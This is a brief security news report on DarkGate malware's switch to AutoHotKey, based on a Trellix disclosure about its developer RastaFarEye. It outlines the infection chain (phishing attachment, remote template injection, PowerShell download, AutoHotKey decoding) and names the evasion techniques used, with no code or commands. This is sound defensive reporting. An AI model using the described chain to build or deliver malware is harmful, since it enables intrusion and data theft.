AutoHotKey Powers Latest DarkGate Malware Update by RastaFarEye

Recent cyber campaigns deploying DarkGate malware, have leveraged AutoHotKey in place of AutoIt scripts during the malware's intermediary infection stage. Trellix has disclosed these adaptations along with fresh insights into the developer known as RastaFarEye. Recognized for its capabilities as a Remote Access Trojan (RAT), DarkGate has required continuous updates to evade detection by security defenses. The most recent version, DarkGate 6, launched in early 2024, reflects these ongoing modifications. Despite encountering significant setbacks, including a ban from underground forums over service complaints, RastaFarEye remains active in both distributing and updating DarkGate. Trellix notes, "This situation may have been detrimental to the economic interests of RastaFarEye; however, DarkGate continues to be distributed and updated regularly. Therefore, we believe that RastaFarEye persists in selling and developing the service despite the ban from underground forums."

The infection chain outlined by Trellix initiates with phishing emails containing either an Excel or HTML attachment. Upon opening the attachment, a VBScript macro is externally downloaded via SMB using the remote template injection technique. This script triggers the download of a PowerShell script, which then using the "Invoke-WebRequest" cmdlet retrieves an AutoHotKey script alongside a text file encoded with the DarkGate payload. The final stage involves the AutoHotKey script decoding and executing the DarkGate malware. DarkGate version 6 showcases its advanced capabilities through features that are designed to bypass security software, employing evasion techniques such as process hollowing and DLL injection. Moreover, the malware is equipped with a broad spectrum of commands, ranging from system surveillance to data exfiltration.